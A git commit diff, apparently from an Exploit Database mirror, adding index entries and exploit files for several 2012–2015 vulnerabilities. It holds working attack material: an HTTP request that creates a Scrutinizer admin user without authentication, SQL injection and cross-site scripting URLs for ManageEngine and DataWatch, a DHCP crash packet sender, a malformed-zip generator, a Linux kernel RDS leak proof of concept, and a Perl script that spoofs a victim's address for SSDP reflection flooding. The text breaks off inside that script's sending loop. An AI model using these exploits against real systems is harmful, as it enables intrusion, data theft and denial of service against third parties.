DB: 2015-07-11
26 new exploits
This commit is contained in:
parent
c1528e8ee0
commit
e8f22fe4b6
27 changed files with 1135 additions and 0 deletions
26
files.csv
26
files.csv
|
@ -33679,6 +33679,7 @@ id,file,description,date,author,platform,type,port
|
|||
37290,platforms/php/webapps/37290.txt,"Milw0rm Clone Script 1.0 - (Auth Bypass) SQL Injection Vulnerability",2015-06-15,"walid naceri",php,webapps,0
|
||||
37291,platforms/windows/dos/37291.py,"Putty 0.64 - Denial of Service Vulnerability",2015-06-15,3unnym00n,windows,dos,0
|
||||
37293,platforms/linux/local/37293.txt,"Ubuntu 12.04_ 14.04_ 14.10_ 15.04 - overlayfs Local Root (Shadow File)",2015-06-16,rebel,linux,local,0
|
||||
37561,platforms/multiple/dos/37561.pl,"UPNPD M-SEARCH ssdp:discover Reflection Denial of Service",2015-07-10,"Todor Donev",multiple,dos,1900
|
||||
37329,platforms/php/webapps/37329.txt,"Nilehoster Topics Viewer 2.3 Multiple SQL Injection and Local File Include Vulnerabilities",2012-05-27,n4ss1m,php,webapps,0
|
||||
37330,platforms/php/webapps/37330.txt,"Yamamah Photo Gallery 1.1 Database Information Disclosure Vulnerability",2012-05-28,L3b-r1'z,php,webapps,0
|
||||
37331,platforms/php/webapps/37331.py,"WHMCS 'boleto_bb.php' SQL Injection Vulnerability",2012-05-29,dex,php,webapps,0
|
||||
|
@ -33839,6 +33840,7 @@ id,file,description,date,author,platform,type,port
|
|||
37487,platforms/multiple/dos/37487.txt,"Apache Sling Denial Of Service Vulnerability",2012-07-06,IOactive,multiple,dos,0
|
||||
37488,platforms/asp/webapps/37488.txt,"WebsitePanel 'ReturnUrl' Parameter URI Redirection Vulnerability",2012-07-09,"Anastasios Monachos",asp,webapps,0
|
||||
37489,platforms/php/webapps/37489.txt,"MGB Multiple Cross Site Scripting and SQL Injection Vulnerabilities",2012-07-09,"Stefan Schurtz",php,webapps,0
|
||||
37546,platforms/linux/dos/37546.pl,"File Roller v3.4.1 - DoS PoC",2015-07-09,Arsyntex,linux,dos,0
|
||||
37492,platforms/ios/webapps/37492.txt,"WK UDID v1.0.1 iOS - Command Inject Vulnerability",2015-07-05,Vulnerability-Lab,ios,webapps,0
|
||||
37534,platforms/php/webapps/37534.txt,"WordPress Easy2Map Plugin 1.24 - SQL Injection",2015-07-08,"Larry W. Cashdollar",php,webapps,80
|
||||
37535,platforms/windows/local/37535.txt,"Blueberry Express 5.9.0.3678 - SEH Buffer Overflow",2015-07-08,Vulnerability-Lab,windows,local,0
|
||||
|
@ -33869,6 +33871,7 @@ id,file,description,date,author,platform,type,port
|
|||
37523,platforms/multiple/remote/37523.rb,"Adobe Flash Player ByteArray Use After Free",2015-07-08,metasploit,multiple,remote,0
|
||||
37524,platforms/hardware/webapps/37524.txt,"Cradlepoint MBR1400 and MBR1200 Local File Inclusion",2015-07-08,Doc_Hak,hardware,webapps,80
|
||||
37525,platforms/windows/dos/37525.c,"Symantec Endpoint Protection 12.1.4013 Service Disabling Vulnerability",2015-07-08,"John Page",windows,dos,0
|
||||
37526,platforms/windows/dos/37526.txt,"Immunity Debugger 1.85 - Crash PoC",2015-07-08,Arsyntex,windows,dos,0
|
||||
37527,platforms/hardware/webapps/37527.txt,"AirLink101 SkyIPCam1620W OS Command Injection",2015-07-08,"Core Security",hardware,webapps,0
|
||||
37528,platforms/php/webapps/37528.txt,"Centreon 2.5.4 - Multiple Vulnerabilities",2015-07-08,"Huy-Ngoc DAU",php,webapps,80
|
||||
37529,platforms/php/webapps/37529.txt,"WordPress MDC YouTube Downloader Plugin 2.1.0 - Arbitrary File Download",2015-07-08,"Larry W. Cashdollar",php,webapps,80
|
||||
|
@ -33877,3 +33880,26 @@ id,file,description,date,author,platform,type,port
|
|||
37532,platforms/hardware/webapps/37532.txt,"AirLive Multiple Products OS Command Injection",2015-07-08,"Core Security",hardware,webapps,8080
|
||||
37533,platforms/asp/webapps/37533.txt,"Orchard CMS 1.7.3_ 1.8.2_ 1.9.0 - Stored XSS Vulnerability",2015-07-08,"Paris Zoumpouloglou",asp,webapps,80
|
||||
37536,platforms/multiple/remote/37536.rb,"Adobe Flash Player Nellymoser Audio Decoding Buffer Overflow",2015-07-08,metasploit,multiple,remote,0
|
||||
37537,platforms/php/webapps/37537.txt,"phpProfiles Multiple Security Vulnerabilities",2012-07-24,L0n3ly-H34rT,php,webapps,0
|
||||
37538,platforms/linux/dos/37538.py,"ISC DHCP 4.x Multiple Denial of Service Vulnerabilities",2012-07-25,"Markus Hietava",linux,dos,0
|
||||
37539,platforms/php/webapps/37539.txt,"REDAXO 'subpage' Parameter Cross Site Scripting Vulnerability",2012-07-25,"High-Tech Bridge SA",php,webapps,0
|
||||
37540,platforms/php/webapps/37540.txt,"Joomla Odudeprofile component 'profession' Parameter SQL Injection Vulnerability",2012-07-25,"Daniel Barragan",php,webapps,0
|
||||
37541,platforms/php/webapps/37541.txt,"tekno.Portal 0.1b 'anket.php' SQL Injection Vulnerability",2012-07-25,Socket_0x03,php,webapps,0
|
||||
37542,platforms/windows/remote/37542.html,"BarCodeWiz 'BarcodeWiz.dll' ActiveX Control 'Barcode' Method Remote Buffer Overflow Vulnerability",2012-07-25,coolkaveh,windows,remote,0
|
||||
37543,platforms/linux/local/37543.c,"Linux Kernel 2.6.x 'rds_recvmsg()' Function Local Information Disclosure Vulnerability",2012-07-26,"Jay Fenlason",linux,local,0
|
||||
37544,platforms/php/webapps/37544.txt,"ocPortal 7.1.5 'redirect' Parameter URI Redirection Vulnerability",2012-07-29,"Aung Khant",php,webapps,0
|
||||
37547,platforms/php/webapps/37547.txt,"Scrutinizer 9.0.1.19899 Multiple Cross Site Scripting Vulnerabilities",2012-07-30,"Mario Ceballos",php,webapps,0
|
||||
37548,platforms/php/webapps/37548.txt,"Scrutinizer 9.0.1.19899 Arbitrary File Upload Vulnerability",2012-07-30,"Mario Ceballos",php,webapps,0
|
||||
37549,platforms/cgi/webapps/37549.txt,"Scrutinizer 9.0.1.19899 HTTP Authentication Bypass Vulnerability",2012-07-30,"Mario Ceballos",cgi,webapps,0
|
||||
37550,platforms/jsp/webapps/37550.txt,"DataWatch Monarch Business Intelligence Multiple Input Validation Vulnerabilities",2012-07-31,"Raymond Rizk",jsp,webapps,0
|
||||
37551,platforms/php/webapps/37551.txt,"phpBB Multiple SQL Injection Vulnerabilities",2012-07-28,HauntIT,php,webapps,0
|
||||
37552,platforms/php/webapps/37552.txt,"JW Player 'playerready' Parameter Cross Site Scripting Vulnerability",2012-07-29,MustLive,php,webapps,0
|
||||
37553,platforms/php/webapps/37553.txt,"eNdonesia 'cid' Parameter SQL Injection Vulnerability",2012-07-29,Crim3R,php,webapps,0
|
||||
37554,platforms/php/webapps/37554.txt,"Limny 'index.php' Multiple SQL Injection Vulnerabilities",2012-07-31,L0n3ly-H34rT,php,webapps,0
|
||||
37555,platforms/java/webapps/37555.txt,"ManageEngine Applications Manager Multiple SQL Injection Vulnerabilities",2012-08-01,"Ibrahim El-Sayed",java,webapps,0
|
||||
37556,platforms/php/webapps/37556.txt,"Distimo Monitor Multiple Cross Site Scripting Vulnerabilities",2012-08-01,"Benjamin Kunz Mejri",php,webapps,0
|
||||
37557,platforms/java/webapps/37557.txt,"ManageEngine Applications Manager Multiple Cross Site Scripting and SQL Injection Vulnerabilities",2012-08-01,"Ibrahim El-Sayed",java,webapps,0
|
||||
37558,platforms/windows/dos/37558.txt,"Notepad++ 6.7.3 - Crash PoC",2015-07-10,"Rahul Pratap Singh",windows,dos,0
|
||||
37559,platforms/php/webapps/37559.txt,"Wordpress CP Image Store with Slideshow Plugin 1.0.5 Arbitrary File Download",2015-07-10,"i0akiN SEC-LABORATORY",php,webapps,0
|
||||
37560,platforms/php/webapps/37560.txt,"Wordpress CP Multi View Event Calendar Plugin 1.1.7 - SQL Injection",2015-07-10,"i0akiN SEC-LABORATORY",php,webapps,0
|
||||
37562,platforms/multiple/dos/37562.pl,"NTPD MON_GETLIST Query Amplification Denial of Service",2015-07-10,"Todor Donev",multiple,dos,123
|
||||
|
|
Can't render this file because it is too large.
|
30
platforms/cgi/webapps/37549.txt
Executable file
30
platforms/cgi/webapps/37549.txt
Executable file
|
@ -0,0 +1,30 @@
|
|||
source: http://www.securityfocus.com/bid/54727/info
|
||||
|
||||
Scrutinizer is prone to an authentication-bypass vulnerability.
|
||||
|
||||
Exploiting this issue may allow an attacker to bypass certain security restrictions and perform unauthorized actions.
|
||||
|
||||
Scrutinizer 9.5.0 is vulnerable; other versions may also be affected.
|
||||
|
||||
#Request
|
||||
POST /cgi-bin/admin.cgi HTTP/1.1
|
||||
Host: 10.70.70.212
|
||||
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:11.0) Gecko/20100101 Firefox/11.0
|
||||
Accept: application/json, text/javascript, */*; q=0.01
|
||||
Accept-Language: en-us,en;q=0.5
|
||||
Accept-Encoding: gzip, deflate
|
||||
Proxy-Connection: keep-alive
|
||||
Content-Length: 70
|
||||
|
||||
tool=userprefs&newUser=trustwave&pwd=trustwave&selectedUserGroup=1
|
||||
|
||||
#Response
|
||||
HTTP/1.1 200 OK
|
||||
Date: Wed, 25 Apr 2012 17:52:15 GMT
|
||||
Server: Apache
|
||||
Vary: Accept-Encoding
|
||||
Content-Length: 19
|
||||
Content-Type: text/html; charset=utf-8
|
||||
|
||||
{"new_user_id":"2"}
|
||||
|
11
platforms/java/webapps/37555.txt
Executable file
11
platforms/java/webapps/37555.txt
Executable file
|
@ -0,0 +1,11 @@
|
|||
source: http://www.securityfocus.com/bid/54756/info
|
||||
|
||||
ManageEngine Applications Manager is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query.
|
||||
|
||||
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
|
||||
|
||||
ManageEngine Applications Manager 10.0 is vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.example.com/mobile/DetailsView.do?method=showMGDetails&groupId=10003645+UnION+SelEct+group_concat(table_NAME),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+information_schema.tables+WHERE+table_schema=database()--%20-
|
||||
|
||||
http://www.example.com/mobile/Search.do?method=mobileSearch&requestid=[SQL INJECTION]mobileSearchPage&viewName=Search
|
24
platforms/java/webapps/37557.txt
Executable file
24
platforms/java/webapps/37557.txt
Executable file
|
@ -0,0 +1,24 @@
|
|||
source: http://www.securityfocus.com/bid/54759/info
|
||||
|
||||
ManageEngine Applications Manager is prone to multiple SQL-injection and multiple cross-site scripting vulnerabilities.
|
||||
|
||||
Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
|
||||
|
||||
ManageEngine Applications Manager 10.0 is vulnerable; prior versions may also be affected.
|
||||
|
||||
http://www.example.com/MyPage.do?method=viewDashBoard&forpage=1&addNewTab=true&selectedpageid=10000017+AND+1=1--%20-[BLIND SQL-INJECTION]
|
||||
|
||||
http://www.example.com/jsp/RCA.jsp?resourceid=10000624&attributeid=1900&alertconfigurl=%2FshowActionProfiles.do%3Fmethod%3DgetResourceProfiles%26admin%3Dtrue%26all%3Dtrue%26resourceid%3D-10000624'+AND+substring(version(),1)=4
|
||||
[BLIND SQL-INJECTION]&Sat%20Jun%2023%202012%2000:47:25%20GMT+0200%20(EET)
|
||||
|
||||
http://www.example.com/showCustom.do?resourcename=null&type=EC2Instance&original_type=EC2Instance&name=&moname=i-3a96b773&tabId=1&baseid=10000015&resourceid=10000744&monitorname=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C&method=showDataforConfs
|
||||
|
||||
http://www.example.com/MyPage.do?method=viewDashBoard&forpage=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C&addNewTab=true&selectedpageid=10000014
|
||||
|
||||
http://www.example.com/jsp/ThresholdActionConfiguration.jsp?resourceid=10000055&attributeIDs=101&attributeToSelect=101&redirectto=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C
|
||||
|
||||
http://www.example.com/showresource.do?resourceid=10000189&type=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C&moname=DNS+monitor&method=showdetails&resourcename=DNS+monitor&viewType=showResourceTypes
|
||||
|
||||
http://www.example.com/jsp/ThresholdActionConfiguration.jsp?resourceid=10000055&attributeIDs=101&attributeToSelect=101%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C&redirectto=/common/serverinfo.do
|
||||
|
||||
http://www.example.com/ProcessTemplates.do?method=createProcessTemplate&templatetype=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C
|
11
platforms/jsp/webapps/37550.txt
Executable file
11
platforms/jsp/webapps/37550.txt
Executable file
|
@ -0,0 +1,11 @@
|
|||
source: http://www.securityfocus.com/bid/54733/info
|
||||
|
||||
DataWatch Monarch Business Intelligence is prone to multiple input validation vulnerabilities.
|
||||
|
||||
Successful exploits will allow an attacker to manipulate the XPath query logic to carry out unauthorized actions on the XML documents of the application. It will also allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
|
||||
|
||||
DataWatch Monarch Business Intelligence 5.1 is vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.example.com/ESAdmin/jsp/tabview.jsp?mode=add</script><script>alert(1)</script>&type=2&renew=1&pageid=PAGE_MPROCESS
|
||||
|
||||
http://www.example.com/ESClient/jsp/customizedialog.jsp?templateType=-1&doctypeid=122&activetab=DM_DOCUMENT_LIST&fields=filter;sort;summary;&searchtype=document'&doclist.jsp
|
82
platforms/linux/dos/37538.py
Executable file
82
platforms/linux/dos/37538.py
Executable file
|
@ -0,0 +1,82 @@
|
|||
source: http://www.securityfocus.com/bid/54665/info
|
||||
|
||||
ISC DHCP is prone to multiple denial-of-service vulnerabilities.
|
||||
|
||||
An attacker can exploit these issues to cause the affected application to crash, resulting in a denial-of-service condition.
|
||||
|
||||
#!/usr/bin/python
|
||||
'''
|
||||
SC DHCP 4.1.2 <> 4.2.4 and 4.1-ESV <> 4.1-ESV-R6 remote denial of
|
||||
service(infinite loop and CPU consumption/chew) via zero'ed client name length
|
||||
|
||||
http://www.k1p0d.com
|
||||
|
||||
'''
|
||||
|
||||
import socket
|
||||
import getopt
|
||||
from sys import argv
|
||||
|
||||
def main():
|
||||
args = argv[1:]
|
||||
try:
|
||||
args, useless = getopt.getopt(args, 'p:h:')
|
||||
args = dict(args)
|
||||
args['-p']
|
||||
args['-h']
|
||||
except:
|
||||
usage(argv[0])
|
||||
exit(-1)
|
||||
|
||||
dhcp_req_packet = ('\x01\x01\x06\x00\x40\x00\x03\x6f'
|
||||
'\x00\x00\x00\x00\x00\x00\x00\x00'
|
||||
'\x00\x00\x00\x00\x00\x00\x00\x00'
|
||||
'\x00\x00\x00\x00\x00\x22\x5f\xae'
|
||||
'\xa7\xdf\x00\x00\x00\x00\x00\x00'
|
||||
'\x00\x00\x00\x00\x00\x00\x00\x00'
|
||||
'\x00\x00\x00\x00\x00\x00\x00\x00'
|
||||
'\x00\x00\x00\x00\x00\x00\x00\x00'
|
||||
'\x00\x00\x00\x00\x00\x00\x00\x00'
|
||||
'\x00\x00\x00\x00\x00\x00\x00\x00'
|
||||
'\x00\x00\x00\x00\x00\x00\x00\x00'
|
||||
'\x00\x00\x00\x00\x00\x00\x00\x00'
|
||||
'\x00\x00\x00\x00\x00\x00\x00\x00'
|
||||
'\x00\x00\x00\x00\x00\x00\x00\x00'
|
||||
'\x00\x00\x00\x00\x00\x00\x00\x00'
|
||||
'\x00\x00\x00\x00\x00\x00\x00\x00'
|
||||
'\x00\x00\x00\x00\x00\x00\x00\x00'
|
||||
'\x00\x00\x00\x00\x00\x00\x00\x00'
|
||||
'\x00\x00\x00\x00\x00\x00\x00\x00'
|
||||
'\x00\x00\x00\x00\x00\x00\x00\x00'
|
||||
'\x00\x00\x00\x00\x00\x00\x00\x00'
|
||||
'\x00\x00\x00\x00\x00\x00\x00\x00'
|
||||
'\x00\x00\x00\x00\x00\x00\x00\x00'
|
||||
'\x00\x00\x00\x00\x00\x00\x00\x00'
|
||||
'\x00\x00\x00\x00\x00\x00\x00\x00'
|
||||
'\x00\x00\x00\x00\x00\x00\x00\x00'
|
||||
'\x00\x00\x00\x00\x00\x00\x00\x00'
|
||||
'\x00\x00\x00\x00\x00\x00\x00\x00'
|
||||
'\x00\x00\x00\x00\x00\x00\x00\x00'
|
||||
'\x00\x00\x00\x00\x63\x82\x53\x63'
|
||||
'\x35\x01\x03\x32\x04\x0a\x00\x00'
|
||||
'\x01\x0c\x00'
|
||||
'\x37\x0d\x01\x1c\x02\x03\x0f'
|
||||
'\x06\x77\x0c\x2c\x2f\x1a\x79\x2a'
|
||||
'\xff\x00\x00\x00\x00\x00\x00\x00'
|
||||
'\x00\x00\x00\x00\x00\x00\x00\x00'
|
||||
'\x00\x00\x00\x00\x00\x00\x00\x00'
|
||||
'\x00\x00\x00\x00')
|
||||
|
||||
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
|
||||
sock.connect((args['-h'], int(args['-p'])))
|
||||
sock.sendall(dhcp_req_packet)
|
||||
print 'Packet sent'
|
||||
sock.close()
|
||||
|
||||
def usage(pyname):
|
||||
print '''
|
||||
Usage: %s -h <host> -p <port>
|
||||
''' % pyname
|
||||
|
||||
if __name__ == "__main__":
|
||||
main()
|
28
platforms/linux/dos/37546.pl
Executable file
28
platforms/linux/dos/37546.pl
Executable file
|
@ -0,0 +1,28 @@
|
|||
#!/usr/bin/perl
|
||||
#
|
||||
# Title: File Roller - DoS PoC
|
||||
# Date: 08/07/2015
|
||||
# Author: Arsyntex
|
||||
# Homepage: https://wiki.gnome.org/Apps/FileRoller
|
||||
# Version: v3.4.1
|
||||
# Tested on: Linux lab 3.2.0-85-generic-pae #122-Ubuntu i686 i386 GNU/Linux
|
||||
# -------------------------------------------------------------------------
|
||||
# Create a zip file with a folder inside named: #
|
||||
#
|
||||
# Run: file-roller --extract-here test.zip
|
||||
#
|
||||
# Result: endless call's of lstat64() (50 % CPU usage) (Freeze app)
|
||||
#
|
||||
|
||||
$zip = "\x50\x4b\x03\x04\x14\x03\x00\x00\x00\x00\xd6\x55\x9c\x46\x00\x00" .
|
||||
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x23\x2f" .
|
||||
"\x50\x4b\x01\x02\x3f\x03\x14\x03\x00\x00\x00\x00\xd6\x55\x9c\x46" .
|
||||
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00" .
|
||||
"\x00\x00\x00\x00\x00\x00\x10\x80\xfd\x41\x00\x00\x00\x00\x23\x2f" .
|
||||
"\x50\x4b\x05\x06\x00\x00\x00\x00\x01\x00\x01\x00\x30\x00\x00\x00" .
|
||||
"\x20\x00\x00\x00\x00\x00";
|
||||
|
||||
open FILE, ">poc.zip" or die("Can't open poc.zip\n") ;
|
||||
binmode(FILE) ;
|
||||
print FILE $zip ;
|
||||
close FILE ;
|
150
platforms/linux/local/37543.c
Executable file
150
platforms/linux/local/37543.c
Executable file
|
@ -0,0 +1,150 @@
|
|||
source: http://www.securityfocus.com/bid/54702/info
|
||||
|
||||
The Linux kernel is prone to a local information-disclosure vulnerability.
|
||||
|
||||
Local attackers can exploit this issue to obtain sensitive information that may lead to further attacks.
|
||||
|
||||
/***************** rds_client.c ********************/
|
||||
|
||||
int main(void)
|
||||
{
|
||||
int sock_fd;
|
||||
struct sockaddr_in serverAddr;
|
||||
struct sockaddr_in toAddr;
|
||||
char recvBuffer[128] = "data from client";
|
||||
struct msghdr msg;
|
||||
struct iovec iov;
|
||||
|
||||
sock_fd = socket(AF_RDS, SOCK_SEQPACKET, 0);
|
||||
if (sock_fd < 0) {
|
||||
perror("create socket error\n");
|
||||
exit(1);
|
||||
}
|
||||
|
||||
memset(&serverAddr, 0, sizeof(serverAddr));
|
||||
serverAddr.sin_family = AF_INET;
|
||||
serverAddr.sin_addr.s_addr = inet_addr("127.0.0.1");
|
||||
serverAddr.sin_port = htons(4001);
|
||||
|
||||
if (bind(sock_fd, (struct sockaddr*)&serverAddr, sizeof(serverAddr)) < 0) {
|
||||
perror("bind() error\n");
|
||||
close(sock_fd);
|
||||
exit(1);
|
||||
}
|
||||
|
||||
memset(&toAddr, 0, sizeof(toAddr));
|
||||
toAddr.sin_family = AF_INET;
|
||||
toAddr.sin_addr.s_addr = inet_addr("127.0.0.1");
|
||||
toAddr.sin_port = htons(4000);
|
||||
msg.msg_name = &toAddr;
|
||||
msg.msg_namelen = sizeof(toAddr);
|
||||
msg.msg_iov = &iov;
|
||||
msg.msg_iovlen = 1;
|
||||
msg.msg_iov->iov_base = recvBuffer;
|
||||
msg.msg_iov->iov_len = strlen(recvBuffer) + 1;
|
||||
msg.msg_control = 0;
|
||||
msg.msg_controllen = 0;
|
||||
msg.msg_flags = 0;
|
||||
|
||||
if (sendmsg(sock_fd, &msg, 0) == -1) {
|
||||
perror("sendto() error\n");
|
||||
close(sock_fd);
|
||||
exit(1);
|
||||
}
|
||||
|
||||
printf("client send data:%s\n", recvBuffer);
|
||||
|
||||
memset(recvBuffer, '\0', 128);
|
||||
|
||||
msg.msg_name = &toAddr;
|
||||
msg.msg_namelen = sizeof(toAddr);
|
||||
msg.msg_iov = &iov;
|
||||
msg.msg_iovlen = 1;
|
||||
msg.msg_iov->iov_base = recvBuffer;
|
||||
msg.msg_iov->iov_len = 128;
|
||||
msg.msg_control = 0;
|
||||
msg.msg_controllen = 0;
|
||||
msg.msg_flags = 0;
|
||||
if (recvmsg(sock_fd, &msg, 0) == -1) {
|
||||
perror("recvmsg() error\n");
|
||||
close(sock_fd);
|
||||
exit(1);
|
||||
}
|
||||
|
||||
printf("receive data from server:%s\n", recvBuffer);
|
||||
|
||||
close(sock_fd);
|
||||
|
||||
return 0;
|
||||
}
|
||||
|
||||
/***************** rds_server.c ********************/
|
||||
|
||||
int main(void)
|
||||
{
|
||||
struct sockaddr_in fromAddr;
|
||||
int sock_fd;
|
||||
struct sockaddr_in serverAddr;
|
||||
unsigned int addrLen;
|
||||
char recvBuffer[128];
|
||||
struct msghdr msg;
|
||||
struct iovec iov;
|
||||
|
||||
sock_fd = socket(AF_RDS, SOCK_SEQPACKET, 0);
|
||||
if(sock_fd < 0) {
|
||||
perror("create socket error\n");
|
||||
exit(0);
|
||||
}
|
||||
|
||||
memset(&serverAddr, 0, sizeof(serverAddr));
|
||||
serverAddr.sin_family = AF_INET;
|
||||
serverAddr.sin_addr.s_addr = inet_addr("127.0.0.1");
|
||||
serverAddr.sin_port = htons(4000);
|
||||
if (bind(sock_fd, (struct sockaddr*)&serverAddr, sizeof(serverAddr)) < 0) {
|
||||
perror("bind error\n");
|
||||
close(sock_fd);
|
||||
exit(1);
|
||||
}
|
||||
|
||||
printf("server is waiting to receive data...\n");
|
||||
msg.msg_name = &fromAddr;
|
||||
|
||||
/*
|
||||
* I add 16 to sizeof(fromAddr), ie 32,
|
||||
* and pay attention to the definition of fromAddr,
|
||||
* recvmsg() will overwrite sock_fd,
|
||||
* since kernel will copy 32 bytes to userspace.
|
||||
*
|
||||
* If you just use sizeof(fromAddr), it works fine.
|
||||
* */
|
||||
msg.msg_namelen = sizeof(fromAddr) + 16;
|
||||
/* msg.msg_namelen = sizeof(fromAddr); */
|
||||
msg.msg_iov = &iov;
|
||||
msg.msg_iovlen = 1;
|
||||
msg.msg_iov->iov_base = recvBuffer;
|
||||
msg.msg_iov->iov_len = 128;
|
||||
msg.msg_control = 0;
|
||||
msg.msg_controllen = 0;
|
||||
msg.msg_flags = 0;
|
||||
|
||||
while (1) {
|
||||
printf("old socket fd=%d\n", sock_fd);
|
||||
if (recvmsg(sock_fd, &msg, 0) == -1) {
|
||||
perror("recvmsg() error\n");
|
||||
close(sock_fd);
|
||||
exit(1);
|
||||
}
|
||||
printf("server received data from client:%s\n", recvBuffer);
|
||||
printf("msg.msg_namelen=%d\n", msg.msg_namelen);
|
||||
printf("new socket fd=%d\n", sock_fd);
|
||||
strcat(recvBuffer, "--data from server");
|
||||
if (sendmsg(sock_fd, &msg, 0) == -1) {
|
||||
perror("sendmsg()\n");
|
||||
close(sock_fd);
|
||||
exit(1);
|
||||
}
|
||||
}
|
||||
|
||||
close(sock_fd);
|
||||
return 0;
|
||||
}
|
134
platforms/multiple/dos/37561.pl
Executable file
134
platforms/multiple/dos/37561.pl
Executable file
|
@ -0,0 +1,134 @@
|
|||
#!/usr/bin/perl
|
||||
#
|
||||
# upnpd M-SEARCH ssdp:discover reflection
|
||||
#
|
||||
# Copyright 2015 (c) Todor Donev
|
||||
# todor.donev@gmail.com
|
||||
# http://www.ethical-hacker.org/
|
||||
# https://www.facebook.com/ethicalhackerorg
|
||||
#
|
||||
# The SSDP protocol can discover Plug & Play devices,
|
||||
# with uPnP (Universal Plug and Play). SSDP is HTTP
|
||||
# like protocol and work with NOTIFY and M-SEARCH
|
||||
# methods.
|
||||
#
|
||||
#
|
||||
# Disclaimer:
|
||||
# This or previous program is for Educational
|
||||
# purpose ONLY. Do not use it without permission.
|
||||
# The usual disclaimer applies, especially the
|
||||
# fact that Todor Donev is not liable for any
|
||||
# damages caused by direct or indirect use of the
|
||||
# information or functionality provided by these
|
||||
# programs. The author or any Internet provider
|
||||
# bears NO responsibility for content or misuse
|
||||
# of these programs or any derivatives thereof.
|
||||
# By using these programs you accept the fact
|
||||
# that any damage (dataloss, system crash,
|
||||
# system compromise, etc.) caused by the use
|
||||
# of these programs is not Todor Donev's
|
||||
# responsibility.
|
||||
#
|
||||
# Use at your own risk and educational
|
||||
# purpose ONLY!
|
||||
#
|
||||
# Wireshark:
|
||||
# udp.port eq 1900 || frame contains "HTTP/1.1 200 OK"
|
||||
#
|
||||
# See also:
|
||||
# SSDP Reflection DDoS Attacks
|
||||
# http://tinyurl.com/mqwj6xt
|
||||
#
|
||||
|
||||
use Socket;
|
||||
|
||||
if ( $< != 0 ) {
|
||||
print "Sorry, must be run as root!\n";
|
||||
print "This script use RAW Socket.\n";
|
||||
exit;
|
||||
}
|
||||
|
||||
my $ssdp = (gethostbyname($ARGV[0]))[4]; # IP Address Source (32 bits)
|
||||
my $victim = (gethostbyname($ARGV[1]))[4]; # IP Address Source (32 bits)
|
||||
|
||||
print "[ upnpd M-SEARCH ssdp:discover reflection ]\n";
|
||||
if (!defined $ssdp || !defined $victim) {
|
||||
print "[ Usage: $0 <upnpd> <victim>\n";
|
||||
print "[ <todor.donev\@gmail.com> Todor Donev ]\n";
|
||||
exit;
|
||||
}
|
||||
print "[ Sending SSDP packets: $ARGV[0] -> $ARGV[1]\n";
|
||||
socket(RAW, PF_INET, SOCK_RAW, 255) or die $!;
|
||||
setsockopt(RAW, 0, 1, 1) or die $!;
|
||||
main();
|
||||
|
||||
# Main program
|
||||
sub main {
|
||||
my $packet;
|
||||
|
||||
$packet = iphdr();
|
||||
$packet .= udphdr();
|
||||
$packet .= payload();
|
||||
# b000000m...
|
||||
send_packet($packet);
|
||||
}
|
||||
|
||||
# IP header (Layer 3)
|
||||
sub iphdr {
|
||||
my $ip_ver = 4; # IP Version 4 (4 bits)
|
||||
my $iphdr_len = 5; # IP Header Length (4 bits)
|
||||
my $ip_tos = 0; # Differentiated Services (8 bits)
|
||||
my $ip_total_len = $iphdr_len + 20; # IP Header Length + Data (16 bits)
|
||||
my $ip_frag_id = 0; # Identification Field (16 bits)
|
||||
my $ip_frag_flag = 000; # IP Frag Flags (R DF MF) (3 bits)
|
||||
my $ip_frag_offset = 0000000000000; # IP Fragment Offset (13 bits)
|
||||
my $ip_ttl = 255; # IP TTL (8 bits)
|
||||
my $ip_proto = 17; # IP Protocol (8 bits)
|
||||
my $ip_checksum = 0; # IP Checksum (16 bits)
|
||||
# IP Packet construction
|
||||
my $iphdr = pack(
|
||||
'H2 H2 n n B16 h2 c n a4 a4',
|
||||
$ip_ver . $iphdr_len, $ip_tos, $ip_total_len,
|
||||
$ip_frag_id, $ip_frag_flag . $ip_frag_offset,
|
||||
$ip_ttl, $ip_proto, $ip_checksum,
|
||||
$victim, $ssdp
|
||||
);
|
||||
return $iphdr;
|
||||
}
|
||||
|
||||
# UDP header (Layer 4)
|
||||
sub udphdr {
|
||||
my $udp_src_port = 31337; # UDP Sort Port (16 bits) (0-65535)
|
||||
my $udp_dst_port = 1900; # UDP Dest Port (16 btis) (0-65535)
|
||||
my $udp_len = 8 + length(payload()); # UDP Length (16 bits) (0-65535)
|
||||
my $udp_checksum = 0; # UDP Checksum (16 bits) (XOR of header)
|
||||
|
||||
# UDP Packet
|
||||
my $udphdr = pack(
|
||||
'n n n n',
|
||||
$udp_src_port, $udp_dst_port,
|
||||
$udp_len, $udp_checksum
|
||||
);
|
||||
return $udphdr;
|
||||
}
|
||||
|
||||
# SSDP HTTP like (Layer 7)
|
||||
sub payload {
|
||||
my $data;
|
||||
$data .= "M-SEARCH * HTTP\/1.1\r\n";
|
||||
# $data .= "HOST:239.255.255.250:1900\r\n"; # Multicast address
|
||||
$data .= "ST:upnp:rootdevice\r\n"; # Search target, search for root devices only
|
||||
$data .= "MAN:\"ssdp:discover\"\r\n";
|
||||
# $data .= "MX:3\r\n\r\n"; # Seconds to delay response
|
||||
my $payload = pack('a' . length($data), $data);
|
||||
return $payload;
|
||||
}
|
||||
|
||||
sub send_packet {
|
||||
while(1){
|
||||
select(undef, undef, undef, 0.10); # Sleeping 100 milliseconds
|
||||
